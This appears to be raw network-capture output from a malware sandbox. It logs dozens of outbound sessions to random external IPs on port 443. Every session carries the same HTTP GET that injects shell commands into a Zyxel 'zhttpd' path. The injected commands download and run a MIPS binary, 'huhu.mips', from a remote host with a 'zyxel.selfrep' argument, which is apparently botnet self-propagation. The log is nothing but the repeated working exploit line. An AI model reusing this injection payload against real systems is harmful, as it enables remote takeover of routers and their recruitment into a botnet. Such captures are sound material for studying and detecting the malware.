                                                      Feb 2, 2024 06:35:39.328134060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      955192.168.2.146085617.17.39.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328174114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      956192.168.2.1441188175.15.21.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328191996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      957192.168.2.1453874157.107.52.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328224897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      958192.168.2.1439062212.224.133.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328263044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      959192.168.2.1458832186.13.27.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328315973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      960192.168.2.144487032.110.237.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328345060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      961192.168.2.1435234110.126.42.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328392029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      962192.168.2.1460908193.146.7.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328428030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      963192.168.2.1434654219.39.145.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328474045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      964192.168.2.1444824195.153.30.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328511953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      965192.168.2.1439600174.204.132.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328551054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      966192.168.2.1437388119.78.125.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328620911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      967192.168.2.1455870219.233.88.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328658104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      968192.168.2.1455486212.251.104.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328728914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      969192.168.2.145838034.154.214.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328768015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      970192.168.2.1437522199.238.239.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328834057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      971192.168.2.146008420.233.102.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328865051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      972192.168.2.144418038.9.141.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328915119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      973192.168.2.145487868.232.64.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328934908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      974192.168.2.1438810133.124.60.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.328960896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      975192.168.2.144596096.167.136.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329031944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      976192.168.2.1444048170.129.236.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329085112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      977192.168.2.143970271.240.201.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329150915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      978192.168.2.1438242193.176.219.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329186916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      979192.168.2.1456194113.49.216.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329277039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      980192.168.2.143280471.222.177.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329351902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      981192.168.2.144000435.224.218.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329351902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      982192.168.2.1449534200.16.85.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329420090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      983192.168.2.144380231.90.93.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329500914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      984192.168.2.1454080194.211.22.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329541922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      985192.168.2.1433490138.21.65.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329662085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      986192.168.2.1456980116.163.65.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329687119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      987192.168.2.1452790163.117.1.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329751015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      988192.168.2.1442334146.18.11.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329780102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      989192.168.2.146030692.38.159.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329816103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      990192.168.2.143955231.40.129.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329894066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      991192.168.2.1455508131.40.41.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329905987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      992192.168.2.143831454.116.13.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329940081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      993192.168.2.1447964136.26.15.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.329993010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      994192.168.2.1443468179.243.35.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330029964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      995192.168.2.144593242.52.49.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330069065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      996192.168.2.144706624.13.23.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330121994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      997192.168.2.143352678.73.32.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330174923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      998192.168.2.1458118180.232.96.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330245972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      999192.168.2.1456908198.29.101.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330358028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1000192.168.2.145119439.46.195.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330410004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1001192.168.2.1441368170.167.207.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330456018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1002192.168.2.1447114139.168.60.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330527067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1003192.168.2.145797485.139.75.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330586910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1004192.168.2.1433980219.204.77.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330600023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1005192.168.2.144095296.14.155.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330684900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1006192.168.2.1451500206.116.129.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330771923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1007192.168.2.1439466131.161.140.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330784082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1008192.168.2.1451320115.168.162.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330838919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1009192.168.2.1458786208.8.68.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330977917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1010192.168.2.1433996177.109.152.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.330977917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1011192.168.2.145750225.66.166.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331049919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1012192.168.2.1447032201.136.193.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331059933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1013192.168.2.1460792221.32.227.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331154108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1014192.168.2.1434058146.71.29.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331207991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1015192.168.2.1452172205.135.99.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331248045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1016192.168.2.1452864187.164.33.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.331281900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1017192.168.2.1436156222.129.54.149443
                                                      TimestampBytes transferredDirectionData
